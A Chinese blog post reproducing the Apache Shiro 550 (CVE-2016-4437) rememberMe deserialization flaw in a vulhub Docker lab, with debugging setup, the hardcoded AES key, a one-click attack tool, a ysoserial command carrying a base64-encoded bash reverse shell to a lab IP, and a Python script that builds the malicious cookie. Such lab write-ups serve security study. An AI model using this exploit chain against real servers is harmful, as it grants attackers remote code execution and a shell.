当前位置：首页 > news >正文

shiro550-cve-2016-4437复现

news 来源：原创 2025/8/26 19:26:06

shiro550-cve-2016-4437

复现环境：docker desktop

idea远程调试jdk版本必须与容器里的jdk1.8.0_102 匹配上，下载资源翻我CC1链那篇文章

注意burpsuite的proxy listeners端口改一下别跟docker容器的重了。

ysoserial工具：https://github.com/frohoff/ysoserial/releases/tag/v0.0.6

一键工具：https://github.com/SummerSec/ShiroAttack2/releases

jdk11后不支持JavaFX库，使用jdk1.8

文章目录

shiro550-cve-2016-4437
- 1. 简介
- 2. 远程调试方法
- 3. 复现流程
- - 1. 工具复现
  - 2. 半手工复现
- 参考

1. 简介

影响版本：Shiro <= 1.2.4

原理：Apache Shiro 提供了一种“rememberMe”功能，用于在用户关闭浏览器后仍然保持会话，当启用该功能时，Shiro 会将用户的会话信息序列化并存储在一个 cookie 中，以便在用户重新访问时反序列化并恢复会话；在这边攻击者可以通过修改“rememberMe” cookie，注入特制的恶意Java 序列化对象；当 Shiro 反序列化这个恶意对象时，攻击者可以在目标系统上执行任意代码。

加密的密钥Key被硬编码在代码里（kPH+bIxk5D2deZiIxcaaaA==）

Payload的构造流程：

恶意命令–>序列化–>AES加密–>base64编码–>发送Cookie

判断方法：随便输账号密码密码，勾选remember me，burpsuite抓包发现请求包中有RememberMe字段，响应包有Set-cookie:rememberMe=deleteMe字段

在这里插入图片描述

Shiro服务器识别身份加解密处理的流程

（1）加密

1.用户使用账号密码进行登录，并勾选"Remember Me"。

2、Shiro验证用户登录信息，通过后，查看用户是否勾选了”Remember Me“。

3、若勾选，则将用户身份序列化，并将序列化后的内容进行AES加密，再使用base64编码。

4、最后将处理好的内容放于cookie中的rememberMe字段。

（2）解密

1、当服务端收到来自未经身份验证的用户的请求时，会在客户端发送请求中的cookie中获取rememberMe字段内容。

2、将获取到的rememberMe字段进行base64解码，再使用AES解密。

3、最后将解密的内容进行反序列化，获取到用户身份。

2. 远程调试方法

C:\Users\21609\vulhub\shiro\CVE-2016-4437目录下修改docker-compose.yml，让它能远程调试

services:web:image: vulhub/shiro:1.2.4ports:- "8080:8080"- "5050:5050"command: java -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5050 -jar /shirodemo-1.0-SNAPSHOT.jar

启容器

C:\Users\21609\vulhub\shiro\CVE-2016-4437>docker-compose up -d

docker desktop进容器里执行命令

su 
find / -name "*.jar"
java -version #openjdk version "1.8.0_102"

cmd里把容器里的文件拷贝出来

docker cp 67192e54766a:/shirodemo-1.0-SNAPSHOT.jar shirodemo-1.0-SNAPSHOT.jar

改后缀为zip解压，idea打开当前目录，右键lib目录，add as library

在file->project structure->module->dependencies里选中lib添加目录BOOT-INF，然后记得打勾，sdk选1.8.0_102

在这里插入图片描述

新建debug configuration

在这里插入图片描述

navigate->Search Everywhere，搜索onSuccessfulLogin函数

isRememberMe为true时，进rememberIdentity函数

在这里插入图片描述

在下图处打断点

在这里插入图片描述

然后idea运行debug configuration

使用admin:vulhub进行登录

在这里插入图片描述

可以看到程序成功断下

在这里插入图片描述

AES CBC模式加密

在这里插入图片描述

注意到密钥是固定值

在这里插入图片描述

3. 复现流程

1. 工具复现

C:\Program Files\Java\jdk1.8.0_102\bin>.\java.exe -jar C:\Users\21609\Downloads\shiro_attack-4.7.0-SNAPSHOT-all\shiro_attack-4.7.0-SNAPSHOT-all.jar

填入密钥kPH+bIxk5D2deZiIxcaaaA==后检测密钥，再点击检测当前利用链。

在这里插入图片描述

点击命令执行输入命令即可执行。

在这里插入图片描述

2. 半手工复现

起个控制台
nc64 -lvvp 8054

使用ysoserial生成CC5的Gadget：

#payload不能包含>,<
#进https://forum.ywhack.com/shell.php选取base64编码的payload
#ip:192.168.75.180 port:8054
#使用 java 命令运行 ysoserial-all.jar 中的类，监听指定端口等待连接
C:\Users\21609\Desktop\code>java -cp ysoserial-all.jar ysoserial.exploit.JRMPListener 7777 CommonsCollections5  "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljc1LjE4MC84MDU0IDA+JjE=}|{base64,-d}|{bash,-i}"

在这里插入图片描述

#pip install pycryptodome
import sys
import uuid
import base64
import subprocess
from Crypto.Cipher import AESdef encode_rememberme(command):popen = subprocess.Popen(['java', '-jar', 'C:\\Users\\21609\\Desktop\\code\\ysoserial-all.jar', 'JRMPClient', command], stdout=subprocess.PIPE)#stdout=subprocess.PIPE：捕获命令的标准输出（即生成的 payload）BS = AES.block_size #获取AES加密的块大小（通常为 16 字节）pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()#用于对数据进行填充，使其长度是块大小的整数倍（PKCS7 填充）key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==") #base64解码出AES密钥iv = uuid.uuid4().bytes #UUID转字节流作为AES加密的初始化向量encryptor = AES.new(key, AES.MODE_CBC, iv)#创建一个 AES 加密器file_body = pad(popen.stdout.read())base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))return base64_ciphertextif __name__ == '__main__':payload = encode_rememberme(input("请输入`攻击机ip:JRMP端口`:"))#攻击机ip:JRMP端口#192.168.75.180:7777print("rememberMe={0}".format(payload.decode()))